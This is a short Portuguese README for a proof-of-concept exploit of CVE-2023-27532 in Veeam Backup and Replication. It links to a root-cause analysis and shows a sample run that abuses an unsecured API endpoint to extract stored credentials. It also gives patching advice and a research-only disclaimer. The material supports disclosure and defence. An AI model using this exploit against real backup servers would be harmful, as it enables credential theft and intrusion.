
Exploit de prova de conceito para CVE-2023-27532 no Veeam Backup and Replication que abusa de um endpoint de API não seguro para extrair credenciais do sistema alvo.
POC para CVE-2023-27532 afetando Veeam Backup and Replication
Uma análise técnica de causa raiz da vulnerabilidade pode ser encontrada em nosso blog: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
Este POC abusa de um endpoint de API não seguro para extrair credenciais.
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
Atualize para a versão mais recente ou mitigue seguindo as instruções no Aviso da Veeam
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.